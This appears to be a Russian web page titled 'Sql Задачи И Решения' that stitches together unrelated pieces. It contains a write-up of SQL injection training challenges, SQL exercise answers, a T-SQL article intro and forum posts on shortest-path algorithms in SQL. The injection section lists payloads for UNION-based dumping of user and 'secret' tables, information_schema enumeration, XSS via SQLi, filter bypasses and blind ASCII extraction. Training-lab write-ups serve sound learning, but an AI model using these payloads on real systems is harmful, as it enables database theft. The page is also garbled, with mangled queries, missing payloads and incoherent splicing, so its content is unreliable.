Sql Задачи И Решения

Posted on

Хочу поделиться с «Хабрахабром» примером своих решений задач по sql-инъекциям с сайта alexbers. Пример 1: Это даже и не пример.

  1. Sql Задачи И Решения Моисеенко
  2. Sql Задачи И Решения

Требуется самому написать запрос с заранее известными всем таблицами, именем пользователя. Дано: Таблица: users Поля: id,login,pass Решение:. from users where id='12 Просто запрос со всеми данными, которые нам заведомо известны. Пример 2: Нам продемонстрирован запрос: select. from users where id=2 or login='$text' Дано: Таблица: users Поля: id,login,pass В этом примере показана примитивная уязвимость: входные данные никак не фильтруются. Поэтому мы можем воспользоваться кавычкой: or id='9 Что мы сделали?

В данной статье рассматриваются две очень интересные задачи T-SQL: возобновление количества и расход количества. В обоих случаях имеют место упорядоченные транзакции, которые добавляют или удаляют какие-либо объекты, и в обоих случаях требуется вычислить текущее состояние после каждой транзакции.. Начнем с высокоэффективного решения для задачи возобновления количества, в котором найден очень любопытный способ применения ряда оконных функций. Затем будет представлена задача расхода количества, эффективное решение для которой предлагается найти читателям самостоятельно. Я пока не нашел рационального решения для этой задачи, но надеюсь, что оно существует. Хочу поделиться с «Хабрахабром» примером своих решений задач по sql-инъекциям с сайта alexbers. Пример 1: www.alexbers.com/sql/1.php. Это даже и не пример.

Sql Задачи И Решения

Мы привели запрос к такому виду: select. from users where id=2 or login='-1' or id='9' Мы пытаемся извлечь из таблицы users пользователя с id=2 или с login=1 или с id=9, которая взята кавычкой слева и будет закрыта кавычкой оригинального запроса.

Поскольку пользователя -1 не существует, мы из этого запроса ничего не получаем, зато id=9 существует. В результате получаем вывод из 2-х строк — пользователь с id=2 и с id=9. Пример 3: Опять виден запрос: select.

from users where id=2 or login='$text' limit 1 Дано: Таблица: users Поля: id,login,pass Различие с предыдущим примером — ограничение на вывод в 1 строку. Уходит приплясывая при постановке комментария, который «уберет» конец строки, т.е. Он не будет обработан. Решение: or id='13 - 123 Вид запроса: select.

from users where id=2 or login='-1 or id='13' -123' limit 1 Таким образом мы выкидываем ограничение и извлекаем пользователя с id=13. Пример 4: Запрос: select. from users where id=2 or login='$text' limit 1 Дано: Таблицы: users, secret Поля: id,login,pass - это в users. В таблице secret - 3 поля Чуток поинтересней. Теперь у нас 2 таблицы и запрос выполняется не к той таблице, которая нам нужна. Воспользуемся классическим способом. В mysql существует оператор, который позволяет выполнять запрос к разным таблицам через 1 запрос.

  1. Задачи и решения» Сергей Моисеенко, «Питер», 2006 г. Рейтинг книги 4.7 из 5 (3 читателя).
  2. Здесь находятся задачи на продвинутые знания SQL запросов. Проверьте свои знания! Есть ответы и примеры решения задач.. Выберите из таблицы workers записи с id равным 3, 5, 6, 10. Решение: SELECT * FROM workers WHERE id IN(3,5,6,10). Выберите из таблицы workers записи с id равным 3, 5, 6, 10 и логином, равным 'eee', 'zzz' или 'ggg'. Решение: SELECT * FROM workers WHERE id IN(3,5,6,10) AND login IN('eee', 'zzz', 'ggg'). Выберите из таблицы workers записи c зарплатой от 500 до 1500. Решение: SELECT * FROM workers WHERE price BETWEEN 500 AND 1500.

Для работы с объеденением запросов нам необходимо, чтобы во всех объединяемых запросах количество полей было одинаковым. Так как мы не можем повлиять на их количество в первом запросе, нам нужно подобрать их количество во втором к первому. Сделать это можно несколькими способами. Воспользуемся оператором UNION.

Дело в том, что количество столбцов до union и после должны соответствовать и, наверняка, вылезет ошибка. Запрос: union select 1,2 - 123 Настоящий вид запроса: select. from users where id=2 or login='-1' union select 1,2 - 123' limit 1 Ответ сервера: Could not query: The used SELECT statements have a different number of columns Значит число отличается от того, которое реально в таблице users. Методом изменения перечисления столбцов приходим к выводу, что число столбцов — 3 штуки. (В этом случае ошибки не будет.) Теперь у нас кое где в странице должны отобразится какие-нибудь из этих цифр.

Теперь чтобы нам получить какую нибудь информацию нам нужно заменять эти цифры в обрщении к скрипту на нужные нам функции. Кстати, тут также можно привести примитивный пример xss через sqli: union select 1,alert('XSS'),3 - 123 Как уже заметили, цифры 1,2,3 выводятся на экран, а ведь это прямая запись кода в страничку. Воспользуемся этим и выведем алерт. Но наша цель — другое: вывести информацию из другой таблицы.

О ней мы знаем только то, что в ней 3 поля и ее название. Чтобы извлечь какие-то поля, мы должны их знать. Сделать это можно несколькими способами, например, если у нас есть доступ к служебной таблице information schema. Таблица informationschema.columns хранит информацию об именах колонок.

Извлечем информацию о всех колонках всех таблиц и отфильтруем ее только теми, которые принадлежат таблице secret:?text=-1'+union+select+1,columnname,3+from+informationschema.columns where tablename='secret'-+123 Можно использовать более обширную и наглядную выборку: where tablename='secret'+-+123 По задаче требуется найти данное секретной таблицы с полем ggg=abc. Извлечем данные колонок f1,f2:?text=-1'+union+select+f1,f2,ggg+from+secret where ggg='abc'-+123 Один из результатов и будет ответом на уровень. Пример 5: Запрос: select.

Sql Задачи И Решения Моисеенко

from users where id=2 or login='$text' limit 1 Дано: Таблицы: users, secret Поля: id,login,pass - это в users. В таблице secret - 2 поля Попробуем повторить предыдущий пример. Узнаем сколько колонок в таблице users, извлечем список всех колонок для секретной таблицы. Union+select+1,concatws(0x3a,tablename,columnname),3+from+informationschema.columns where tablename='secret'-+123 Видим, что у нас в таблице secret – находится 2 колонки, извлечем их значения: union select 1,dfgdfgfdg,dfgfddfgdfdfdf from secret- 123 Видим ответ. Пример 6: Запрос: select.

from users where id=$text limit 1 Дано: Таблицы: users Поля: id,login,pass - это в users. Фильтруются кавычки, выводится только 1 строка из БД Здесь видно непонимание принципов работы фильтра mysqrealescapestring, когда значение переменной id не помещено в кавычки.

Тогда, хоть они и 50 раз фильтруются, они нам и не нужны. Выборка проста до невозможности: union select id,login,pass from users where login=CHAR(103, 111, 100) Допустим, что нам слишком много известно из «дано». Обычно приходится подбирать все вручную и здесь нас пытается обломать «выводится только 1 строка из БД». В таких случаях можно использовать объединение результата запроса в 1 строку: union select 1,2,groupconcat(concatws(0x3a,id,login,pass)) from users where id27 Для перемещения по такой выборке можно использовать либо id, либо строку (часть вывода) которую в частном примере нужно будет пропустить через char (спасибо rdot.org). Пример 7: Дано: Таблицы: users Поля: id,login,pass - это в users.Теперь всегда выводится только первая строка ответа(остальные не выводятся) Фильтруются символы ',',+,=,запятая,пробел,скобки Запрос: select. from users where id=$text limit 1 Поскольку выборка идет сразу по нужной нам таблице, то даже не придется использовать второй запрос.

Пробелы заменяются на комметарии /./ и /.!./, остается только одна проблема — фильтруется знак равенства. Но его можно обойти, используя оператор like. Этот опреатор можно использовать, сравнивая напрямую со строкой, но тогда придется использовать кавычки, либо без кавычек, и требуется перекодировать строку в hex. Также, нам доподлинно неизвестен ник, который мы ищем, поэтому будем использовать поиск по маске со значком% в логине. Итоговый вектор атаки примет вид: Пример 8: Запрос: select.

from users where id=$text Дано: Таблицы: users Поля: id,login,pass - это в users. Подсказка: сообщения от ошибках не выведутся Единственное, что нам вообще что-то выводится — информация о том, что произошла какая-то ошибка, или количество выведенных записей. Количество выводимых записей — единственное число, которым мы можем управлять. От нас требуется получить пароль от пользователя. Пароль — это некоторая информация, записываемая в числово-буквенном виде.

Все, чем мы можем оперировать — цифры. Значит пароль надо представить в численном виде. Если взять и перевести каждый символ в ascii–вид, то любой символ из пароля будет в виде числа. Для отделения символа воспользуемся функцией mid, для перевода в ascii – функция ascii, вектор атаки получится вот таким: or id.

Какие подходы применяются для решения алгоритмических задач на чистом SQL, без использования процедурных расширений? Например, задача о поиске кратчайшего пути в графе. Возникают вопросы - как реализовать обход графа, как хранить промежуточные значения вычислений, как задать критерий остановки алгоритма.

В качестве СУБД пусть будет Oracle. Кажется, что основным подходом является использование иерархических запросов, но какие структуры данных использовать (строки?) и как отобразить алгоритмические операторы языков общего назначения (условия, циклы) на SQL, не очень понятно.

Ну раз пошла такая пьянка, дайте и мне похвастаться. Волновой алгоритм, диалект MySQL. DROP PROCEDURE IF EXISTS Wave; DELIMITER @@ CREATE PROCEDURE Wave (IN NodeFrom INT, IN NodeTo Int) /. Поиск пути в направленном взвешенном ненормированном графе от NodeFrom до NodeTo волновым алгоритмом. Допустимы изолированные вершины, дольность, контуры, кратные рёбра, мультиграф, листья, петли и пр.

Sql Задачи И Решения

Функциональность модифицируется комментариями в коде. С обоими комментариями - ищет наиболее дешёвый путь из не более чем MaxIterations шагов. Если раскомментировать.1 - ищет наиболее дешёвый из максимально коротких длиной не более чем MaxIterations шагов. Если раскомментировать.2 - ищет наиболее дешёвый путь из всех возможных. Если раскомментировать.1 и.2 - ищет наиболее дешёвый из максимально коротких. Если путь не найден - возвращает 0 записей, иначе одну с путём и его стоимостью. Однажды я решал задачу по поиску кратчайшего пути в графе как раз на SQL (правда на PostgreSQL, но это не суть).